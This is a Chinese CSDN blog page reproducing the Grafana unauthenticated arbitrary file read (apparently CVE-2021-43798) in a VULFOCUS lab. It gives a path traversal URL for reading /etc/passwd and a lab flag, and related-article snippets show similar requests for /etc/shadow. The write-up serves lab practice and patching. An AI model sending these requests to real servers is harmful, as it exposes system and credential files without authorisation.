[文件读取]Grafana未授权任意文件读取

最新推荐文章于 2024-08-02 15:46:02 发布

wj33333

最新推荐文章于 2024-08-02 15:46:02 发布

阅读量461

点赞数

分类专栏：文件读取漏洞库文章标签： grafana 安全网络

本文链接：https://blog.csdn.net/wj33333/article/details/134407394

版权

漏洞库同时被 2 个专栏收录

23 篇文章 0 订阅

订阅专栏

文件读取

16 篇文章 0 订阅

订阅专栏

1.1漏洞描述

漏洞编号	Grafana未授权任意文件读取
漏洞类型	文件读取
漏洞等级	⭐⭐⭐
漏洞环境	VULFOCUS
攻击方式

描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞，攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

1.2漏洞等级

高危

1.3影响版本

Grafana

1.4漏洞复现

1.4.1.基础环境

靶场	VULFOCUS
工具	BurpSuite

1.4.2.前提

网站后台地址：无
后台管理账密：五
后台登录地址：无

1.5深度利用

1.5.1漏洞点

/public/plugins/alertlist/../../../../../../../../etc/passwd

查看etc/passwd

查看/tmp/flag

拿到flag

flag-{bmhbefaa613-07a2-457a-b949-1a374a78e3b6}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

升级

打补丁

上设备

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

wj33333

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Grafana 未经授权的任意文件读取漏洞复现（CVE-2021-43798 ）

千寻的博客

12-16

3533

文章目录漏洞名称漏洞编号漏洞描述影响版本fofa漏洞点复现步骤修复建议参考链接免责声明漏洞名称 Grafana 未经授权的任意文件读取漏洞编号 CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台，用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞，攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。影响版本 Grafana 8.x fofa app

Grafana版本＜8.3任意文件读取

The current road is different, love needs to distinguish between right and wrong

12-30

704

简介 Grafana是一个跨平台、开源的数据可视化网络应用程序平台，用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。目前测试Grafana 8.3之前版本存在未授权任意文件读取漏洞，可以在未经身份验证的情况下可通过默认存在的插件，构造特殊的请求包读取服务器任意文件。漏洞利用抓包获取get请求重放数据包 /public/plugins/alertmanager/../../../../../../../../../../etc/shadow 测试 fo

参与评论您还未登录，请先登录后发表或查看评论

vluhub Grafana 任意文件读取漏洞分析（CVE-2021-43798 ）

热门推荐

LiBai'S BLOG

12-18

1万+

Grafana 未授权任意文件读取~

Grafana 未授权任意文件读取

qq_45770644的博客

12-07

695

Grafana 未授权任意文件读取 0day 漏洞

Grafana未授权任意文件读取

Amateur

12-08

423

CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞，攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。该漏洞危害等级：高危影响范围经测试，目前最新版本（Grafana v8.2.6）仍存在漏洞。根据目前FOFA系统最新数据（一年内数据），显示全球范围内（app=“Grafana”）共有 234,937 个相关服务对外

Grafana 未经授权任意访问漏洞（CVE-2022-32275）

murphysec的博客

06-08

9813

CVE-2022-32275漏洞是由于Grafana存在未授权访问漏洞，攻击者可以通过特定url，访问任意用户系统界面及读取任意文件。该漏洞影响范围一般。该问题已在新版本中修复，建议用户更新到最新版本。参考链接：https://nvd.nist.gov/vuln/detail/CVE-2022-32275 MISC:https://github.com/BrotherOfJhonny/grafana/blob/main/README.md 【使用墨菲安全的开源工具帮您快速检测代码安全】墨菲安全

Grafana 未授权任意文件读取漏洞

weixin_51387754的博客

12-07

999

漏洞简介 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞，攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。经测试，目前最新版本（Grafana v8.2.6）仍存在漏洞。漏洞复现 app=“Grafana” 抓包 GET /public/plugins/graph/../../../../../../../../../../../../../../..

【漏洞复现】Grafana任意文件读取漏洞 (CVE-2021-43798)

做自己喜欢的事，并将其发挥到极致！

12-08

1224

0X01 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台，用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞，攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 0x02 源码分析搜索漏洞存在路径 /public/plugins/ 在api.go文件中 r.Get("/public/plugins/:pluginId/*", hs.getPluginAssets) 跟踪对应的 getPlugin

[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798

qq_51577576的博客

09-02

1968

[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。Grafana存在任意文件读取漏洞未授权的攻击者利用该漏洞，能够获取服务器敏感文件。...

CVE-2021-43798——Grafana 未授权任意文件读取_grafana未授权访问(2)

2401_84519859的博客

05-16

481

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！内容实在太多，不一一截图了。

Grafana任意文件读取

Cobra的博客

12-08

5001

Grafana任意文件读取漏洞描述 Grafana存在任意文件读取漏洞，通过默认存在的插件，可构造特殊的请求包读取服务器任意文件影响版本 Grafana 8.x 漏洞复现 POC HTTP://XXX.XXX.XXX.XXX/public/plugins/插件名称/../../../../../../../../../etc/passwd 检测脚本 import requests import sys args = str(sys.argv[1]) f = open("./

Grafana任意文件读取 (CVE-2021-43798)

weixin_63231007的博客

10-07

1056

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞，攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

Grafana任意文件读取漏洞（CVE-2021-43798）

qq_50854662的博客

06-27

1136

Grafana任意文件读取漏洞

Grafana plugins 任意文件读取

天行健，君子以自强不息

06-09

218

圣人之道，吾性自足，不假外求

【vulhub系列】CVE-2021-43798 Grafana未授权任意文件读取复现

Wiofgb的博客

08-17

1167

记录一次CVE-2021-43798 Grafana未授权任意文件读取复现

【漏洞复现】Grafana任意文件读取（CVE-2021-43798）

m0_52923241的博客

03-11

1384

只要是安装了任何一个插件就可以出现任意文件读取，因为是plugins的问题。

CVE-2021-43798 Grafana任意文件读取复现

weixin_46137328的博客

01-09

1350

0x00 概述Grafana是一个完全开源的度量分析与可视化平台，可对来自各种各种数据源的数据进行查询、分析、可视化处理以及配置告警。Grafana的读取文件接口存在未授权，且未对文件地址...

JAVA实现远程文件读取示例

"本文将介绍如何使用JAVA编程语言实现远程文件读取的功能。通过创建一个简单的客户端程序，我们可以连接到远程服务器，读取指定路径的文件内容，并在本地打印出来。" 在Java中，实现远程文件读取通常涉及到网络编程...